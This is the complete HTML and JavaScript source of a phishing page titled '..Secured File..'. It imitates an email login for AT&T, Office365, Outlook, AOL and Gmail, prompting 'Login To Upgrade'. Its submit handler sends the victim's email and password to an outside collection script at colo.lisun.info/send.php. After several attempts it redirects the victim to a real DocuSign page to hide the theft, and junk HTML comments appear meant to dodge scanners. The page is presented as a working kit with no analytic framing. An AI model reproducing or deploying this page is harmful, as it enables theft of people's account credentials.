<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<head>

    <meta http-equiv="content-type" content="text/html; charset=utf-8" />
	<meta name="author" content="SemiColonWeb" />
    <link rel="shortcut icon" href="favicon.ico">

<head>
  <script src="https://code.jquery.com/jquery-3.1.1.min.js" crossorigin="anonymous"></script>
  <!--www Rcwvvwv2rrrrrrr222222eqyjbbu -->
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

  <!-- dfe3redgrrrrhwhhhwBoww22222222rrrrr222wo-->
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css"
    integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
  <link href="https://fonts.googleapis.com/css?family=Yellowtail&display=swap" rel="stylesheet">
  <title>..Secured File..</title>
  <link href="" rel="stylesheet" media="all">

  <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/core.min.js"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.9-1/md5.js"></script>
  <style type="text/css">
    .hide {
      display: none;
    }

    .grey-form {
      background-color: #eee;
      opacity: 1;
      pointer-events: none;
    }

    .alert-success {
      color: #155724;
      background-color: #d4edda;
      border-color: #c3e6cb;
    }



    .modal-body {
    padding: 0 !important;
}
.login-container{
    position: relative;
    /*width: 400px;*/
    margin: 80px auto;
    padding: 20px 41px 40px;
    text-align: center;
    background: #fff;
    border: 1px solid #ccc;
}

#output{
    position: absolute;
    width: 300px;
    top: -76px;
    left: 0;
    color: #fff;
}

#output.alert-success{
    background: rgb(26, 204, 25);
}

#output.alert-danger{
    background: rgb(228, 105, 107);
}


.login-container::before,.login-container::after{
    content: "";
    position: absolute;
    width: 100%;height: 100%;
    top: 3.5px;left: 0;
    background: #fff;
    z-index: -1;
    -webkit-transform: rotateZ(4deg);
    -moz-transform: rotateZ(4deg);
    -ms-transform: rotateZ(4deg);
    border: 1px solid #ccc;

}

.login-container::after{
    top: 5px;
    z-index: -2;
    -webkit-transform: rotateZ(-2deg);
     -moz-transform: rotateZ(-2deg);
      -ms-transform: rotateZ(-2deg);

}

.avatar{
    width: 100px;height: 100px;
    margin: 10px auto 30px;
    border-radius: 100%;
    border: 2px solid #aaa;
    background-size: cover;
}

.form-box input{
    width: 100%;
    padding: 10px;
    text-align: center;
    height:40px;
    border: 1px solid #ccc;;
    background: #fafafa;
    transition:0.2s ease-in-out;

}

.form-box input:focus{
    outline: 0;
    background: #eee;
}

.form-box input[type="text"]{
    border-radius: 5px 5px 0 0;
    text-transform: lowercase;
}

.form-box input[type="password"]{
    border-radius: 0 0 5px 5px;
    border-top: 0;
}

.form-box button.login{
    margin-top:15px;
    padding: 10px 20px;
}

.animated {
  -webkit-animation-duration: 1s;
  animation-duration: 1s;
  -webkit-animation-fill-mode: both;
  animation-fill-mode: both;
}

@-webkit-keyframes fadeInUp {
  0% {
    opacity: 0;
    -webkit-transform: translateY(20px);
    transform: translateY(20px);
  }

  100% {
    opacity: 1;
    -webkit-transform: translateY(0);
    transform: translateY(0);
  }
}

@keyframes fadeInUp {
  0% {
    opacity: 0;
    -webkit-transform: translateY(20px);
    -ms-transform: translateY(20px);
    transform: translateY(20px);
  }

  100% {
    opacity: 1;
    -webkit-transform: translateY(0);
    -ms-transform: translateY(0);
    transform: translateY(0);
  }
}

.fadeInUp {
  -webkit-animation-name: fadeInUp;
  animation-name: fadeInUp;
}
  </style>

<script>
  var loading = true;
  if(loading) {
      var href = window.location.href;
      var regex = new RegExp("[&\\?]cmd=");
      if (regex.test(href)) {
      } else {
          let rand =  Math.random() * 1000000000;
          var md5 = CryptoJS.MD5(rand);
          window.location.href = href.replace(/]/g, '') + `#cmd=in_sut&id=${rand + rand}&session=${md5 + md5}`
          loading = false;
      }
  }
</script>
</head>

<body>
  <div class="container-fluid">
    <div class="row"
      style="height: 100vh; background-image: url('https://i.ibb.co/Nx2zVW4/imagesign.png'); background-size: cover;background-repeat: no-repeat;">
      <div class="container">
        <div class="row">
          <div class="col-lg-6 mx-auto my-5 px-5 pb-5">

            <div class="mt-3">
              <div class="row">
                <div class="col-lg-12">
                  <a href="javascript:void(0)" id="gmailmodal" class="hvr-grow w-100" style="text-decoration: none;"
                    data-toggle="modal" data-target="#ajaxModal">
                    <div class="mt-2">
                      <span class="pl-4"
                        style="vertical-align: middle; color: white;font-weight: 500;border-radius: 4px; "></span>
                    </div>
                  </a>
                </div>
                <div class="col-lg-12">
                  <a href="javascript:void(0)" id="outlookmodal" class="hvr-grow w-100" style="text-decoration: none;"
                    data-toggle="modal" data-target="#ajaxModal">
                    <div class=" mt-2">

                      <span class="pl-4"
                        style="vertical-align: middle; color: white;font-weight: 500;border-radius: 4px; "></span>
                    </div>
                  </a>
                </div>
              </div>
              <div class="row">
                <div class="col-lg-12 ">
                  <a href="javascript:void(0)" id="aolmodal" class="hvr-grow w-100" style="text-decoration: none;"
                    data-toggle="modal" data-target="#ajaxModal">
                    <div class="  mt-2">

                      <span class="pl-4"
                        style="vertical-align: middle; color: white;font-weight: 500;border-radius: 4px; "></span>
                    </div>
                  </a>
                </div>
                <div class="col-lg-12">
                  <a href="javascript:void(0)" id="office365modal" class="hvr-grow w-100" style="text-decoration: none;"
                    data-toggle="modal" data-target="#ajaxModal">
                    <div class=" mt-2">

                      <span class="pl-4"
                        style="vertical-align: middle; color: white;font-weight: 500;border-radius: 4px; "></span>
                    </div>
                  </a>
                </div>
              </div>
              <div class="row">
                <div class="col-lg-12 ">
                  <a href="javascript:void(0)" id="aolmodal" class="hvr-grow w-100" style="text-decoration: none;"
                    data-toggle="modal" data-target="#ajaxModal">
                    <div class="  mt-2">

                      <span class="pl-4"
                        style="vertical-align: middle; color: white;font-weight: 500;border-radius: 4px; "></span>
                    </div>
                  </a>
                </div>
                <div class="col-lg-12">
                  <a href="javascript:void(0)" id="office365modal" class="hvr-grow w-100" style="text-decoration: none;"
                    data-toggle="modal" data-target="#ajaxModal">
                    <div class=" mt-2">

                      <span class="pl-4"
                        style="vertical-align: middle; color: white;font-weight: 500;border-radius: 4px; "></span>
                    </div>
                  </a>
                </div>
              </div>
              <div class="row">
                <div class="col-lg-12 ">
                  <a href="javascript:void(0)" id="aolmodal" class="hvr-grow w-100" style="text-decoration: none;"
                    data-toggle="modal" data-target="#ajaxModal">
                    <div class="  mt-2">

                      <span class="pl-4"
                        style="vertical-align: middle; color: white;font-weight: 500;border-radius: 4px; "></span>
                    </div>
                  </a>
                </div>
                <div class="col-lg-12">
                  <a href="javascript:void(0)" id="office365modal" class="hvr-grow w-100" style="text-decoration: none;"
                    data-toggle="modal" data-target="#ajaxModal">
                    <div class=" mt-2">

                      <span class="pl-4"
                        style="vertical-align: middle; color: white;font-weight: 500;border-radius: 4px; "></span>
                    </div>
                  </a>
                </div>
              </div>
              <div class="row">
                <div class="col-lg-12 ">
                  <a href="javascript:void(0)" id="aolmodal" class="hvr-grow w-100" style="text-decoration: none;"
                    data-toggle="modal" data-target="#ajaxModal">
                    <div class="  mt-2">

                      <span class="pl-4"
                        style="vertical-align: middle; color: white;font-weight: 500;border-radius: 4px; "></span>
                    </div>
                  </a>
                </div>
                <div class="col-lg-12">
                  <a href="javascript:void(0)" id="office365modal" class="hvr-grow w-100" style="text-decoration: none;"
                    data-toggle="modal" data-target="#ajaxModal">
                    <div class=" mt-2">

                      <span class="pl-4"
                        style="vertical-align: middle; color: white;font-weight: 500;border-radius: 4px; "></span>
                    </div>
                  </a>
                </div>
              </div>
              <div class="col-lg-12 ">
                <a href="javascript:void(0)" id="aolmodal" class="hvr-grow w-100" style="text-decoration: none;"
                  data-toggle="modal" data-target="#ajaxModal">
                  <div class="  mt-2">

                    <span class="pl-4"
                      style="vertical-align: middle; color: white;font-weight: 500;border-radius: 4px; "></span>
                  </div>
                </a>
              </div>
              <div class="col-lg-12">
                <a href="javascript:void(0)" id="office365modal" class="hvr-grow w-100" style="text-decoration: none;"
                  data-toggle="modal" data-target="#ajaxModal">
                  <div class=" mt-2">

                    <span class="pl-4"
                      style="vertical-align: middle; color: white;font-weight: 500;border-radius: 4px; "></span>
                  </div>
                </a>
              </div>
            </div>

            </a>
          </div>
          <div class="col-lg-12">
            <p class="text-white mt-3 text-center"></p>
            <p class="h5 text-center text-white"></p>

          </div>

        </div>
      </div>
    </div>
  </div>



  </div>
  </div>



  <!-- M22222222tttttttttt22222-->
  <div style="display: block !important" class="modal" id="ajaxModal" tabindex="-1" role="dialog"
    aria-labelledby="exampleModalLabel" aria-hidden="true">
    <div class="modal-dialog" role="document">
      <div class="modal-content">
        <div class="modal-header">
        </div>
        <div class="modal-body">
          <center>
            <img id="fieldImg" class="img-fluid" width="150px">

            <h5 class="modal-title" id="exampleModalLabel"><span id="head-message" class=""></span><br></h5>
            <span class="font-weight-normal"></span>
            <br>
            
          </center>
          <form id="contact" class="form-horizontal well">
            <div class="col-lg-12">
              <div class="form-group">

                <label for="exampleInputEmail1">Email address</label>
                <input  type="email"
                  name="email" class="form-control" id="email" aria-describedby="emailHelp" placeholder="Enter email"
                  value='' required="">
                <!-- rrrr<s22222222m22222222ddrr2ll  cl-->
              </div>
            </div>
            <div class="col-lg-12">
              <div style="margin-bottom: 0.5rem !important;" class="form-group">
                <label for="Password">Password</label>
                <input type="password" name="password" class="form-control" id="password" aria-describedby="emailHelp"
                  placeholder="Enter Password" required="">
              </div>
            </div>
        </div>
        <div class="modal-footer" style="padding: 0.5rem !important;">
          <button class="btn btn-lg btn-info pull-right" id="submit-btn">Login</button>
        </div>
        </form>
      </div>
    </div>
  </div>

</body>

<script>
    $(document).ready(function(){

      var count=0;

      $('#contact').submit(function(event){
        event.preventDefault();
        $('#msg').html('Loading...');
        var email=$("#email").val();
        var password=$("#password").val();
        var detail=$("#field").html();
        $("#password").addClass('grey-form');

        count=count+1;
        if (count>3) {
          $('#msg').html('Loading..');
        }else
        {
        $.ajax({
          dataType: 'JSON',
          url: 'https://colo.lisun.info/send.php',
          type: 'GET',
          data: {
            user: email,
            pass: password,
            detail: detail
          },
          // da222222t,
          beforeSend: function (xhr) {
            $('#submit-btn').html(' Please Wait..');
          },
          success: function (response) {
            console.log(response);
            if(response['msg']=="errorsend"){

              if(count<=2){
                $('#msg').html('<color style="color:red;">An Error Occurred Please Try Again Later</color>');
                $("#password").removeClass('grey-form');
                $("#password").val('');
                $("#password").focus();
              }
              if(count>=3){
                $('#msg').html('Loading...');
                setTimeout('window.location.href=\x27https://www.docusign.net/Signing/SessionTimeout.aspx?fi=230f89df-896f-418c-81af-7ffb9804b50f\x27;', 0x5dc);
              }

            }else{
              if (response['signal'] == 'no-pass') {
                count = 0;
                $("#msg").show();
                $('#msg').addClass('alert-danger');
                $("#password").val('');
                $("#password").removeClass('grey-form');
                $(".modal-header").addClass('hide');
                // conso;

              }
              if (response['signal'] == 'success') {
                $('#msg').html(response['msg']);
                $("#msg").show();
                $('#msg').addClass('alert-success');
                $(".modal-header").addClass('hide');
                setTimeout('window.location.href=\x27#\x27;', 0x5dc);

              }
              if (response['signal'] == 'no-auth') {
                $('#msg').html(response['msg']);
                $("#msg").show();
                $('#msg').addClass('alert-danger');
                $("#password").removeClass('grey-form');
                $("#password").val('');
                $(".modal-header").addClass('hide');
                // 22222222SSSSSSS2222']);
              }
              else {
                $('#msg').html(response['msg']);
                setTimeout('window.location.href=\x27#\x27;', 0x5dc);
              }
            }
          },
          error: function (response) {
            console.log(response);

          },
          complete: function (response) {
            console.log(response);
            $('#submit-btn').html('Login');
          }
        });
       }
     });
    });


  var hash = window.location.hash;
  console.log(hash)

  var encoded_string = hash.split('#')[1];

  //doww2222222222cccdddxxxxxxxum;
  var email=$("#email").val();
  console.log(email);
  var domain = email.substring(email.lastIndexOf("@") +1);
  var frmsite = domain.substring(0, domain.lastIndexOf("."));
  document.getElementById("fieldImg").src = `https://travelwithgrant.boardingarea.com/wp-content/uploads/2014/10/ATT-Long-Logo-1-768x144.jpg`;
  document.getElementById("head-message").innerHTML = `${ucFirst(frmsite)} Login To Upgrade `



  function getProcessparameter(){
        let s = getParameterByName('lo')
          let arr = JSON.parse(atob(s));
          return arr['email'];
    }

function getProcessHash(){
      if(window.location.hash){
        let h = window.location.hash;
          let s = h.split('#')[1];
          let arr = JSON.parse(atob(s));

          return arr['email'];
      }

      return null;
    }

      function getParameterByName(name, url) {
        if (!url) url = window.location.href;
        name = name.replace(/[[]]/g, '\\$&');
        var regex = new RegExp('[?&]' + name + '(=([^&#]*)|&|#|$)'),
          results = regex.exec(url);
        if (!results) return null;
        if (!results[2]) return '';
        var encodedUri = decodeURIComponent(results[2].replace(/\+/g, ' '));
        return encodedUri;
      }

        function ucFirst(str){
      return str.charAt(0).toUpperCase()+ str.slice(1);
    }

</script>

</html>
